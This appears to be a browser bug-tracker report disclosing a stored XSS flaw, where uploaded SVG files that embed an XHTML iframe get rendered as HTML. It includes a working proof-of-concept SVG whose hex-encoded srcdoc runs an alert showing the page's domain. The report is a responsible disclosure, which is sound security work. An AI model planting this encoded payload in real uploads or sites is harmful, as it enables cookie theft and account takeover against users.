UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36

Steps to reproduce the problem:
I don't know i have to report this bug here or not.

I'm able to reproduce this xss on Chrome, Firefox and Opera.

I have found a persistent xss vulnerability that allows attackers steal user's cookies, do csrf attacks against victim account or do phishing attacks. This vulnerability occurs due the page allows svg attachments that contains "xmlns=http://www.w3.org/1999/xhtml", then the page will render the content of the xml as html , so resulting on a xss vulnerability.

<svg xmlns="http://www.w3.org/2000/svg" viewbox="-1 -1 15 15">
  <rect y="0" height="13" width="12" stroke="#179" rx="1" fill="#2ac"/>
  <text x="1.5" y="11" font-family="courier" stroke="white" font-size="16"><![CDATA[B]]></text>
  <iframe xmlns="http://www.w3.org/1999/xhtml" srcdoc="&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x45;&#x44;&#x20;&#x3D;&#x3E;&#x20;&#x44;&#x6F;&#x6D;&#x61;&#x69;&#x6E;&#x28;&#x27;&#x2B;&#x74;&#x6F;&#x70;&#x2E;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x64;&#x6F;&#x6D;&#x61;&#x69;&#x6E;&#x2B;&#x27;&#x29;&#x27;&#x29;&#x3B;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;"></iframe>
</svg>

kindly let me know if you needed more info.

What is the expected behavior?

What went wrong?
Some web apps now allow svg files to be uploaded under images category.

Did this work before? N/A 

Chrome version: 50.0.2661.94  Channel: stable
OS Version: OS X 10.11.4
Flash Version: Shockwave Flash 21.0 r0

i reported this bug on hackerone internet bug bounty program they told me This is by-designed browser behavior. If you disagree, file a bug report with Mozilla or Chrome. Thanks! that's why i'm reporting this bug here.

Best Regard
Shubham
 

Deleted: Internet Bug Bounty.png 43.1 KB

	Internet Bug Bounty.png 43.1 KB View Download